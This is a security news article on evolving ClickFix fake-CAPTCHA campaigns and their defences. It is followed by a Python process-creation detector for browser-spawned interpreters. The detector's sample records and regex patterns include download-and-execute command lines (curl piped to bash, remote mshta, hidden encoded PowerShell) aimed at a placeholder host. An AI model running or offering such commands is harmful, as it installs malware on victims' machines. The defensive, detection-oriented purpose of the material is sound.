Cybercriminals continue to refine social engineering techniques, and the latest evolution of the ClickFix malware campaign demonstrates how far deception has advanced.
According to researchers at Push Security, new variants of ClickFix attacks now feature video tutorials, countdown timers, and automatic operating system detection, all designed to trick users into infecting their own systems.
A New Spin on an Old Trick
ClickFix attacks have been active for several years, typically relying on a simple yet highly effective social engineering tactic: convincing victims to paste and execute malicious code on their own devices.
The new campaign maintains that same core method but has added multiple layers of sophistication to increase success rates.
Traditionally, ClickFix pages displayed text instructions claiming to verify a user’s identity or fix a supposed software issue.
Victims were told to copy code from a webpage and run it in their terminal or command prompt — actions that would silently download and execute malware.
However, recent campaigns identified by Push Security researchers replace these static instructions with embedded video tutorials that walk users through the process of running the malicious code.
The inclusion of video makes the attack feel more authentic and interactive, lowering skepticism and reducing the chance of user error.
Manipulation Through Design
The new ClickFix webpages resemble Cloudflare CAPTCHA verification screens, complete with realistic logos, layout, and interactive elements.
Behind the scenes, JavaScript on the page automatically detects the victim’s operating system — Windows, macOS, or Linux — and adjusts the malicious commands accordingly.
Once a user lands on the page, the fake verification screen begins a one-minute countdown timer, adding psychological pressure and urgency.
Users are told they must complete the verification within the time limit to continue accessing the website.
A “users verified in the last hour” counter further reinforces the illusion of legitimacy by implying that others have completed the same process safely.
Push Security reports that the malicious JavaScript can also automatically copy commands to the clipboard, allowing users to paste and execute the payload without ever seeing the actual code.
This automation minimizes the likelihood of mistakes that could alert the victim.
Multi-Platform Capabilities
Earlier versions of ClickFix were already known to target all major operating systems, but the new campaigns introduce dynamic instruction delivery that tailors payloads to each environment.
For Windows users, ClickFix often employs MSHTA or PowerShell scripts, leveraging built-in Windows components to fetch and execute the payload.
On macOS and Linux, attackers rely on shell commands and living-off-the-land binaries that do not trigger standard antivirus or endpoint detection alerts.
Push Security notes that many of these malicious pages are distributed through malvertising on Google Search, where attackers purchase ads or use SEO poisoning to push infected sites higher in results.
Some actors also compromise legitimate websites through vulnerable WordPress plugins, injecting their JavaScript payloads directly into trusted pages.
The Next Phase of ClickFix
Researchers warn that future versions of ClickFix may run entirely in the browser, allowing malicious code execution without requiring the victim to open a terminal.
This browser-based evolution would make detection even harder, as endpoint detection and response (EDR) tools typically focus on monitoring system-level processes, not in-browser activity.
The payloads associated with ClickFix attacks vary, but information-stealing malware remains the most common.
These infostealers are designed to collect browser credentials, cryptocurrency wallet data, and system information, which can then be sold on dark web marketplaces or used for follow-up attacks.
Building Resilience Against ClickFix
Defending against ClickFix requires both technical controls and user awareness, as the attack primarily relies on social engineering rather than just software vulnerabilities. Key mitigations include:
- Educate users on social engineering tactics: Reinforce that no legitimate website or service will ever ask users to paste or execute terminal commands for verification.
- Block malvertising and SEO poisoning sources: Use ad blockers, safe browsing tools, and DNS filtering to prevent redirection to malicious sites.
- Monitor clipboard and command-line activity: Implement endpoint monitoring for suspicious PowerShell, MSHTA, or shell executions initiated by browsers.
- Patch on a regular basis: Keep WordPress plugins, themes, and CMS components updated to prevent attackers from injecting malicious scripts into legitimate sites.
- Use browser isolation or sandboxing: Separate web browsing activity from the host operating system to reduce exposure to in-browser exploitation.
- Deploy web filtering and threat intelligence: Leverage URL categorization and known IoC feeds to block access to ClickFix-related domains.
These mitigations can help build cyber resilience against ClickFix attacks.
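The clipboard and command-line monitoring item above can be turned into a concrete detection rule. What follows is an added example written for this article, not code from the article or from Push Security: it scans process-creation records for command interpreters launched from a browser, scores the command line for the features described above (encoded PowerShell, MSHTA fetching remote content, curl or wget piped into a shell), and also covers the weaker case where the interpreter is started via the Run dialog or a terminal rather than by the browser process itself. The field names, the browser, launcher and interpreter name sets, the scoring weights, and the sample records (including the `example.invalid` hosts) are all assumptions constructed for the example and should be tuned to the environment.

```python
"""
Added example, not code from the article or from Push Security: a small
detector over process-creation records (generic Sysmon/EDR-style fields,
an assumption) that flags command interpreters spawned from a browser or
from the Run dialog / terminal chain, and scores the command line for
ClickFix-style features. All sample records below are constructed.
"""
from dataclasses import dataclass
import re

# Parent process names. A browser parent is the strongest signal; the
# launcher set is the chain produced when a user pastes into Win+R or a
# terminal instead (assumption of this example; adjust per environment).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe",
            "google chrome", "firefox", "safari"}
LAUNCHERS = {"explorer.exe", "windowsterminal.exe", "terminal"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "bash", "sh", "zsh", "osascript"}

# Command-line features; each match adds one point to the score.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"-(enc|encodedcommand|e)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"https?://", re.I), "remote URL in command line"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", re.I), "download piped to shell"),
    (re.compile(r"\bmshta\b.*(\.hta\b|https?://)", re.I), "mshta loading remote content"),
    (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), "hidden window"),
]


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Last path component, lower-cased; accepts both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(ev: ProcessEvent):
    """Return (score, reasons); a score of 0 means the event is not of interest."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if child not in INTERPRETERS:
        return 0, []
    if parent in BROWSERS:
        score, reasons = 2, [f"{child} spawned directly by browser {parent}"]
    elif parent in LAUNCHERS:
        score, reasons = 1, [f"{child} spawned via {parent}"]
    else:
        return 0, []
    for pattern, label in SUSPICIOUS_PATTERNS:
        if pattern.search(ev.command_line):
            score += 1
            reasons.append(label)
    return score, reasons


def detect(events, threshold=2):
    """Return alert records for events scoring at or above the threshold.

    With the default weights, an interpreter spawned directly by a browser
    alerts on its own; one spawned via explorer.exe or a terminal needs at
    least one suspicious command-line feature, so ordinary shell use stays quiet.
    """
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"host": ev.host, "user": ev.user, "score": score,
                           "reasons": reasons, "command_line": ev.command_line})
    return alerts


# Constructed sample records: three ClickFix-style chains and two benign ones.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "alice", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("WS02", "bob", r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://verify.example.invalid/check.hta"),
    ProcessEvent("MAC01", "carol",
                 "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
                 "/bin/bash", 'bash -c "curl -fsSL https://verify.example.invalid/v | bash"'),
    ProcessEvent("WS02", "bob", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe"),
    ProcessEvent("SRV01", "svc_backup", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['score']}] {alert['host']}/{alert['user']}: "
              f"{'; '.join(alert['reasons'])}")
```

Run as-is, the three constructed ClickFix chains are reported and the two benign records (a user opening cmd.exe normally, a scheduled backup script started by services.exe) are not. In a real deployment the same logic maps onto a SIEM or EDR query over process-creation telemetry; the scoring keeps a browser-parent chain alertable on its own while requiring corroborating command-line features for the noisier explorer.exe and terminal parents.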
ClickFix’s success lies not just in sophisticated malware, but in manipulating human behavior.
By combining visual trust cues, urgency, and automation, the attackers effectively bypass many traditional security defenses.
This growing ability to exploit human trust reinforces why adopting zero-trust principles is essential to counter emerging threats.
